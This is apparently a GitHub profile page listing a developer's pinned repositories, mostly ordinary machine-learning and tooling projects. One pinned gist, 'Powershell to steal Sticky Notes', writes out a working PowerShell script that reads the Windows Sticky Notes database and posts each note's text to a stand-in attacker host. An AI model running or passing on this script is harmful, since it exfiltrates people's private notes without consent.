🔨
Grinding
Ex-Microsoft SWE - Core Azure Networking
C# expert
Azure expert
All things cyber
- Australia
-
12:58
(UTC +11:00)
Pinned Loading
-
TellMeMore
TellMeMore PublicWeb app to collectively preform reconnaissance on web hosted solutions
C#
-
Flute
Flute PublicFlute - a simple interface for creating, training and deploying machine learning models
C#
-
Powershell to steal Sticky Notes
Powershell to steal Sticky Notes 1$env:TEMP + "\PSSQLite\1.0.3\PSSQLite.psm1" | Import-Module
2$Database = $env:LOCALAPPDATA + "\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite"
3$notes = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Note LIMIT 100"
4foreach($note in $notes) { Invoke-RestMethod -Uri "https://bad-guys-server.com" -Method Post -Headers @{"Content-Type"="application/json"} -Body @{"NoteText"=$note.Text} | ConvertTo-Json }
-
ApplicationInspector-action
ApplicationInspector-action PublicGithub Action for Microsoft ApplicationInspector
Dockerfile
-
brainjsReactNativeExample
brainjsReactNativeExample PublicReact Native example of how to use offline trained models for brain js
JavaScript
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.